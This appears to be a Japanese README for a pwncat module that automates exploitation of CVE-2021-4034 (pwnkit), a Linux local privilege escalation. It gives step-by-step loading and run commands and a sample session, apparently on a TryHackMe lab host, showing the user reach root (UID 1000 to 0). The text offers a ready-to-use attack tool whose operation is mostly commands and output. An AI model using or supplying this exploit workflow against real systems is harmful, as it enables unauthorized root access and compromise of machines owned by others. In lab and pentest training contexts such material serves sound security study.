
pwncatモジュールで、CVE-2021-4034(pwnkit)を自動的に悪用します。
このモジュールの目的は、pwncat 使用時にターゲットに対して CVE-2021-4034 (pwnkit) の悪用を試みることです。
ディレクトリのセットアップ、ソースのコンパイル、リモートターゲットへの gcc のインストールは一切不要です。pwnkit モジュールが pwncat フレームワークを使用してこれを自動的に処理します。
pwnkit.py を pwncat-cs がインストールされているホスト上の任意の場所にコピーします。例: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit と入力します。次のような表示が確認できるはずです:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit と入力するだけです。成功すると、UID が 0 に変わり、root になっているはずです。例:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load を呼びたくない場合は、~/.local/share/pwncat/modules に配置することで、pwncat が起動時にこのモジュールを自動的に読み込むようにできます。# Set the gcc path
set cross "/usr/bin/gcc"
Caleb Stewart 氏に特別な感謝を捧げます。開発者の視点から pwncat フレームワークを学ぶ過程で大変助けていただきました。時間ができたら、これをメインの pwncat escalate モジュールに組み込むプルリクエストを送ります…約束します。:-)